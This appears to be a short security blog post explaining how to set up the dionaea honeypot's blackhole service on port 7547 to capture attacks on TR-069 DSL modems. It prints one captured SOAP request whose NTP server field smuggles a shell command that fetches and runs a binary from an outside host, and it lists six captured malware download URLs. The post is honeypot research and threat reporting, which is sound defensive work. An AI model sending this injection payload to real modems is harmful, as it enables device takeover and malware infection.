Use dionaea to capture attacks against TR-069

In the last days attacks against port 7547 have increased. You can capture some data with your dionaea honeypot.

Since dionaea version 0.6 a new service called blackhole is available in dionaea. This service can simulate a very basic service and collect data submitted to the honeypot. To enable the service get dionaea version 0.6 or later and edit or create a config file in the services-enabled directory with the following content.

- name: blackhole
  config:
    services:
      # TR-069
      - port: 7547
        protocol: tcp

Restart dionaea and it will start to listen on tcp port 7547. At the time of writing you should see the first attacks within a very short period of time.

In the example below you can see the data captured by dionaea a few seconds after the restart. The XML data has been reformatted to be more readable.

POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <SOAP-ENV:Body>
        <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
            <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>
            <NewNTPServer2></NewNTPServer2>
            <NewNTPServer3></NewNTPServer3>
            <NewNTPServer4></NewNTPServer4>
            <NewNTPServer5></NewNTPServer5>
        </u:SetNTPServers>
    </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

I was able to capture 6 different addresses within a few minutes.

  • http://tr069.pw/1
  • http://tr069.pw/2
  • http://srrys.pw/1
  • http://srrys.pw/2
  • http://l.ocalhost.host/1
  • http://l.ocalhost.host/2

Some requests don't have a shell command but it seems if they have some additional exploit code attached at the end.

The Internet Storm Center has collected some additional information about the Port 7547 SOAP Remote Code Execution Attack Against DSL Modems

Links

Related articles